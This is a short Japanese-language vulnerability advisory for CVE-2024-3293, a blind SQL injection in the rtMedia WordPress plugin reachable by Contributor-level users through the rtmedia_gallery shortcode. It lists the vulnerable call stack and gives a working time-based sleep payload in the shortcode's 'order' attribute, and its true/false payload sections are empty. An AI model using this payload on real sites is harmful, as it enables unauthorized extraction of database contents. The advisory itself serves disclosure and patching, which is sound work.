
CVE-2024-3293 WordPress、BuddyPress、bbPress向けrtMedia <= 4.6.18 - 認証済み(Contributor+)SQLインジェクション(rtmedia_galleryショートコード経由)
rtMedia for WordPress, BuddyPress and bbPress <= 4.6.18 - 認証済み(Contributor+)rtmedia_galleryショートコードによるSQLインジェクション
説明
rtMedia for WordPress, BuddyPress and bbPress プラグインは、バージョン4.6.18以前のすべてのバージョンにおいて、rtmedia_galleryショートコードを介したブラインドSQLインジェクションに対して脆弱です。これは、ユーザー指定パラメータのエスケープ処理が不十分であり、既存のSQLクエリの準備が十分でないためです。この脆弱性により、投稿者(Contributor)レベル以上のアクセス権を持つ認証済み攻撃者が、既存のクエリに追加のSQLクエリを挿入し、データベースから機密情報を抽出できる可能性があります。
コールスタック
RTMediaModel->get (\buddypress-media\app\helper\RTMediaModel.php:61)
RTMediaModel->get_media (\buddypress-media\app\helper\RTMediaModel.php:227)
RTMediaQuery->populate_media (\buddypress-media\app\main\routers\query\RTMediaQuery.php:869)
RTMediaQuery->populate_data (\buddypress-media\app\main\routers\query\RTMediaQuery.php:993)
RTMediaQuery->get_data (\buddypress-media\app\main\routers\query\RTMediaQuery.php:1214)
RTMediaQuery->query (\buddypress-media\app\main\routers\query\RTMediaQuery.php:684)
RTMediaQuery->__construct (\buddypress-media\app\main\routers\query\RTMediaQuery.php:184)
RTMediaGalleryShortcode::render (\buddypress-media\app\main\controllers\shortcodes\RTMediaGalleryShortcode.php:271)
Payload:
[rtmedia_gallery global="true" album_id="57" order_by="ratings" order=",media_id,(select 1 from (select sleep(IF(1=1,5,0)))x)"]


Payload true:

Payload false:
